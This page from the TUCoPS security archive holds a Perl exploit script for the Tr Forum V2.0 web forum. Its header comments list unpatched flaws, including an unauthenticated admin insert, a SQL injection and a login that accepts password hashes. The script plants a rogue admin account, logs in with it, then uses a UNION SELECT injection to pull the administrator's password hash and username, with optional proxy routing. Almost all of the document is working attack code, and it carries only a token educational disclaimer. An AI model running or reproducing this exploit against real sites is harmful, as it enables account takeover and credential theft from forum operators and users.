TUCoPS :: Web BBS :: etc :: b06-4547.htm

Tr Forum V2.0 Multiple Vulnerabilities
Tr Forum V2.0 Multiple Vulnerabilities
Tr Forum V2.0 Multiple Vulnerabilities


#!/usr/bin/perl=0D
#=0D
# Affected.scr..: Tr Forum V2.0=0D
# Poc.ID........: 10060903=0D
# Type..........: SQL Injection, Bypass Security Restriction=0D
# Risk.level....: Medium=0D
# Vendor.Status.: Unpatched=0D
# Src.download..: comscripts.com/scripts/php.tr-forum.1579.html=0D
# Poc.link......: acid-root.new.fr/poc/10060903.txt=0D
# Credits.......: DarkFig=0D
#=0D
# /membres/modif_profil.php => Profil modification (you can choose the id of the member)=0D
# /membres/change_mdp.php   => Password modification ( same... )=0D
# /admin/insert_admin.php   => Second admin (only del post)=0D
# /admin/editer.php         => SQL Injection without quote=0D
#=0D
# You don't need to crack passwd hashes (for the admin panel)...=0D
# Go to the admin panel (/admin/), enter the username and the hash (not the passwd)... bad security =(=0D
# This exploit is FOR EDUCATIONAL PURPOSE ONLY x 999=0D
#=0D
use LWP::UserAgent;=0D
use HTTP::Cookies;=0D
use HTTP::Request::Common "POST";=0D
use HTTP::Response;=0D
use Getopt::Long;=0D
use strict;=0D
=0D
print STDOUT "\n+", '-' x 53, "+\n";=0D
print STDOUT "|    Tr Forum V2.0 Admin MD5 Passwd Hash Disclosure   |\n";=0D
print STDOUT '+', '-' x 53, "+\n";=0D
=0D
my($host,$path,$proxh,$proxu,$proxp);=0D
my $opt = GetOptions(=0D
   'host=s'   =>  \$host,=0D
   'path=s'   =>  \$path,=0D
   'proxh=s'  =>  \$proxh,=0D
   'proxu=s'  =>  \$proxu,=0D
   'proxp=s'  =>  \$proxp);=0D
=0D
if(!$host) {=0D
    print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options]    |\n";=0D
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";=0D
    print STDOUT '+', '-' x 53, "+\n";=0D
    exit(0);=0D
}=0D
=0D
if($host !~ /http/) {$host = 'http://'.$host;}=0D 
if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}=0D 
if(!$path) {$path = '/';}=0D
=0D
print STDOUT " [!]Host..: $host\n";=0D
print STDOUT " [!]Path..: $path\n";=0D
print STDOUT " [~]Admin user...\n";=0D
sleep(1);=0D
=0D
my $cc = HTTP::Cookies->new();=0D
my $ua = LWP::UserAgent->new();=0D
   $ua->cookie_jar($cc);=0D
   $ua->agent('0xzilla');=0D
   $ua->timeout(30);=0D
   $ua->proxy(['http'] => $proxh) if $proxh;=0D
=0D
my $re = POST $host.$path.'/admin/insert_admin.php',[=0D
         'login'    => 'AcidSploitWasHere',=0D
         'password' => 'psychopasswd',=0D
'mail' => 'nospam@bot.com',=0D 
         ];=0D
   $re->proxy_authorization_basic($proxu, $proxp) if $proxp;=0D
   $ua->request($re);=0D
=0D
print STDOUT " [+]User..: AcidSploitWasHere\n";=0D
print STDOUT " [+]Pass..: psychopasswd\n";=0D
print STDOUT " [!]Rights: 2 (medium)\n";=0D
print STDOUT " [~]Collecting admin's hash/username...\n";=0D
sleep(1);=0D
=0D
my $re = POST $host.$path.'index.php',[=0D
         'login'   => 'AcidSploitWasHere',=0D
         'pwd'     => 'psychopasswd',=0D
        ];=0D
   $ua->request($re);=0D
=0D
my $re = $ua->get($host.$path.'admin/editer.php?id2=-1 UNION SELECT pass,pseudo,0 FROM tr_user_forum');=0D
=0D
if($re->content =~ /">([a-z0-9]{32})<\/font>/) {=0D
                print STDOUT "\n ".$1.'::';}=0D
=0D
if($re->content =~ /;">(.*?)<\/textarea>/) {=0D
                print STDOUT $1.' (root)';}=0D
=0D
print STDOUT "\n+", '-' x 53, "+\n";=0D
exit(0);

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH